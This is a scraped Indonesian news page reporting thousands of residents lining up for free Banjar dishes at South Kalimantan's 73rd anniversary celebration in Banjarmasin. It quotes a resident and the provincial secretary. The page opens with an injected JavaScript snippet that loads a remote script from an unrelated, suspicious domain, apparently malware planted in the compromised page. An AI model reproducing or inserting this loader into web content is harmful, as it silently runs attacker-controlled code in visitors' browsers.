(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Warga Padati Stan Kuliner Gratis Hari Jadi Ke-73 Kalsel


KANALKALIMANTAN.COM, BANJARMASIN – Ribuan warga berbondong-bondong mendatangi lokasi puncak peringatan Hari Jadi Ke-73 Kalimantan Selatan (Kalsel) di kawasan Siring 0 Kilometer Banjarmasin, Selasa (15/8/2023) pagi.

Mereka yang datang bukan hanya untuk menyaksikan seremonial peringatan Hari Jadi Ke-73 Kalsel, tetapi juga datang untuk menikmati kuliner gratis yang disediakan.

Ribuan warga terlihat sudah berdiri di depan puluhan stan yang tersedia, mereka rela antre untuk mendapatkan makana yang dilirik pada pesta rakyat tersebut.

Tidak ketinggalan makanan khas Kalsel Soto Banjar dan Gangan Waluh serta wadai tradisional khas Kalsel tersedia di puluhan stan yang tersedia.

Baca juga: BREAKING NEWS! Protes SK Gubernur, Ratusan Driver Online Serbu DPRD Kalsel

Muhammad Zaini (70), warga asal Jalan Veteran, Kecamatan Banjarmasin Timur sengaja datang seorang diri untuk mencicipi kuliner yang disediakan secara gratis.

Pria paruh baya ini memilih menu masakan Gangan Waluh khas Kalsel dengan dilengkapi lauk ikan gabus dan ikan sepat.

“Aku pilih iwak haruan sama sepat saja,” ungkapnya.

Sementara itu, menu yang disediakan stan jajaran SKPD di lingkungan Pemprov Kalsel, perbankan, dan perhotelan sebagian besar adalah masakan khas Banjar.

Baca juga: DPW Forsa Kalsel Dilantik, Amalkan Pesan Dakwah dari Lagu Rhoma Irama

“Sebelumnya seluruh SKPD diminta menyiapkan paling sedikit 100 porsi hidangan makanan berupa kuliner khas Banjar untuk dibagikan kepada masyarakat,” kata Sekda Kalsel Roy Rizali.

Sementara itu, seremonial peringatan Hari Jadi Ke-73 Kalsel di halaman eks kantor Gubernur kawasan Siring 0 Km Banjarmasin.

Gubernur Kalsel H Sahbirin Noor bersama Wakil Gubernur H Muhidin terlihat telah berada di lokasi acara dengan mengenakan pakaian adat Banjar berwarna kuning.

Begitu juga Pimpinan SKPD dan Kepala Daerah di Kabupaten/Kota se Kalsel telah hadir dilokasi acara dengan mengenakan pakaian adat Banjar. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

21 menit ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

1 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

3 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

3 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

3 jam ago

This website uses cookies.